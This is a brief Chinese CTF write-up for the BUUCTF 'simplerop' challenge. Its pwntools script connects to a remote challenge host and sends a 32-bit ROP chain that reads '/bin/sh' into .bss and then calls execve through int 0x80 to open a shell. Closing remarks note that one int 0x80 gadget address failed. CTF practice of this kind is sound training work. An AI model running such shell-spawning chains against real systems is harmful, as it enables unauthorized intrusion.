静态链接的文件，应该是 ROP 然后系统调用
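from pwn import *

# The write-up notes the target is statically linked, so the chain is built
# only from gadgets inside the binary and ends in an `int 0x80` syscall.
context.log_level = 'debug'

io = remote("node4.buuoj.cn", 26958)
#io = process('./simplerop')
elf = ELF('./simplerop')  # parsed for reference only; not used below
#gdb.attach(io)

# Gadget / data addresses as given in the write-up.  Register order for the
# pop gadget is assumed from its name (edx, ecx, ebx) — it matches the chain.
pop_eax = 0x080bae06
pop_edx_ecx_ebx = 0x0806e850
int_80 = 0x0806EEF0
sh_addr = 0x080be238  # not used by the chain below
bss_addr = 0x080EAF86  # writable scratch area that receives "/bin/sh\0"

# Stage 1: eax=3 (read on 32-bit Linux), edx=8 bytes, ecx=bss_addr, ebx=0 (stdin).
payload = b'a' * 0x20  # padding up to the saved return address
payload += p32(pop_eax) + p32(0x3)
payload += p32(pop_edx_ecx_ebx) + p32(0x8) + p32(bss_addr) + p32(0)
payload += p32(int_80)
# Stage 2: eax=11 (execve on 32-bit Linux), edx=0, ecx=0, ebx=bss_addr.
payload += p32(pop_eax) + p32(11)
payload += p32(pop_edx_ecx_ebx) + p32(0) + p32(0) + p32(bss_addr)
payload += p32(int_80)

io.send(payload)
# Must be bytes on Python 3: a str is only accepted by pwntools with an
# "assuming ASCII" warning.  The read above takes exactly 8 bytes, so the
# newline that sendline appends is left unread on stdin.
io.sendline(b'/bin/sh\x00')
#pause()
io.interactive()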
int 0x80 = 0x080493e1 这个中断地址好像不行，不知道为什么
我换了个地址就打通了，有点莫名其妙。